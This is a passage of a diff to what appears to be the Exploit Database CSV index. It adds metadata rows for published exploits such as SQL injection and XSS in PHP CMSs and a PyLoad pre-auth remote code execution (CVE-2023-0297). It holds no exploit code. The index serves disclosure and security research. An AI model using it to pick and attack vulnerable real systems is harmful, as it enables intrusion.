Injection",2013-09-20,linc0ln.dll,webapps,php,,2013-09-20,2018-03-01,1,OSVDB-97526,,,,,https://www.securityfocus.com/bid/62572/info 37651,exploits/php/webapps/37651.html,"Monstra CMS 1.2.1 - Multiple HTML Injection Vulnerabilities",2012-08-23,LiquidWorm,webapps,php,,2012-08-23,2018-03-01,1,OSVDB-84839,,,,,https://www.securityfocus.com/bid/55171/info 39567,exploits/php/webapps/39567.txt,"Monstra CMS 3.0.3 - Multiple Vulnerabilities",2016-03-16,"Sarim Kiani",webapps,php,80,2016-03-28,2016-03-28,0,,,,,http://www.exploit-db.commonstra-3.0.3.zip, @@ -24760,6 +24764,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 18035,exploits/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,webapps,php,,2011-10-26,2011-12-21,0,OSVDB-76573;CVE-2011-5185,,,,, 43994,exploits/php/webapps/43994.txt,"Online Test Script 2.0.7 - 'cid' SQL Injection",2018-02-07,L0RD,webapps,php,80,2018-02-07,2018-02-07,1,,"SQL Injection (SQLi)",,,, 50597,exploits/php/webapps/50597.txt,"Online Thesis Archiving System 1.0 - SQLi Authentication Bypass",2021-12-14,"Yehia Elghaly",webapps,php,,2021-12-14,2021-12-14,0,,,,,, +51521,exploits/php/webapps/51521.txt,"Online Thesis Archiving System v1.0 - Multiple-SQLi",2023-06-14,nu11secur1ty,webapps,php,,2023-06-14,2023-06-14,0,,,,,, 49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,, 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,,2018-07-04,2018-07-04,0,CVE-2018-12908,,,,, 50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php,,2021-08-20,2021-08-20,0,,,,,, @@ -28102,8 +28107,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info 35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip, 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,, +51517,exploits/php/webapps/51517.txt,"projectSend r1605 - CSV injection",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,, 51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,, +51518,exploits/php/webapps/51518.txt,"projectSend r1605 - Stored XSS",2023-06-14,"Mirabbas Ağalarov",webapps,php,,2023-06-14,2023-06-14,0,,,,,, 35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip, 36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip, 39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip, @@ -30490,6 +30497,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49975,exploits/php/webapps/49975.txt,"TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)",2021-06-10,"Mert Daş",webapps,php,,2021-06-10,2021-06-10,0,,,,,http://www.exploit-db.comtextpattern-4.8.7.zip, 49617,exploits/php/webapps/49617.txt,"Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)",2021-03-04,"Tushar Vaidya",webapps,php,,2021-03-04,2021-03-04,0,,,,,, 50095,exploits/php/webapps/50095.py,"TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)",2021-07-05,"Mevlüt Akçam",webapps,php,,2021-07-05,2021-07-05,0,,,,,, +51523,exploits/php/webapps/51523.txt,"Textpattern CMS v4.8.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,, 2965,exploits/php/webapps/2965.txt,"TextSend 1.5 - '/config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,webapps,php,,2006-12-19,,1,OSVDB-32381;CVE-2006-6686,,,,, 25997,exploits/php/webapps/25997.txt,"tForum b0.9 - 'member.php' Cross-Site Scripting",2005-07-18,wannacut,webapps,php,,2005-07-18,2013-06-07,1,,,,,,https://www.securityfocus.com/bid/14303/info 1611,exploits/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure",2006-03-25,undefined1_,webapps,php,,2006-03-24,2016-06-30,1,OSVDB-24164;CVE-2006-1412,,,,http://www.exploit-db.comtftgallery-0.10.zip, @@ -33991,6 +33999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43827,exploits/php/webapps/43827.txt,"XOOPS < 2.0.11 - Multiple Vulnerabilities",2015-06-29,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00079;CVE-2005-2112;CVE-2005-2113,,,,,http://gulftech.org/advisories/XOOPS%20Multiple%20Vulnerabilities/79 9249,exploits/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,webapps,php,,2009-07-23,,1,OSVDB-56598;CVE-2009-4714;OSVDB-56597;CVE-2009-4713;OSVDB-56596;OSVDB-56595;CVE-2009-4698;OSVDB-56594;OSVDB-56593,,,,, 9261,exploits/php/webapps/9261.txt,"XOOPS Celepar Module Qas - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,webapps,php,,2009-07-26,2016-10-27,1,CVE-2009-4698;OSVDB-56595;OSVDB-56594;OSVDB-56593,,,,, +51520,exploits/php/webapps/51520.txt,"Xoops CMS 2.5.10 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-06-14,tmrswrr,webapps,php,,2023-06-14,2023-06-14,0,,,,,, 37376,exploits/php/webapps/37376.php,"XOOPS Cube PROJECT FileManager - 'xupload.php' Arbitrary File Upload",2012-06-12,KedAns-Dz,webapps,php,,2012-06-12,2015-06-26,1,,,,,,https://www.securityfocus.com/bid/53945/info 3849,exploits/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",webapps,php,,2007-05-03,,1,OSVDB-34472;CVE-2007-2543,,,,, 39188,exploits/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,webapps,php,,2014-05-19,2016-01-07,1,CVE-2014-3935;OSVDB-107104,,,,,https://www.securityfocus.com/bid/67460/info @@ -34516,6 +34525,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48727,exploits/python/webapps/48727.py,"Pi-hole 4.3.2 - Remote Code Execution (Authenticated)",2020-08-04,"Luis Vacacas",webapps,python,,2020-08-04,2020-08-04,0,CVE-2020-8816,,,,, 38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip, +51522,exploits/python/webapps/51522.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-14,2023-06-14,0,CVE-2023-0297,,,,, 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,, 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,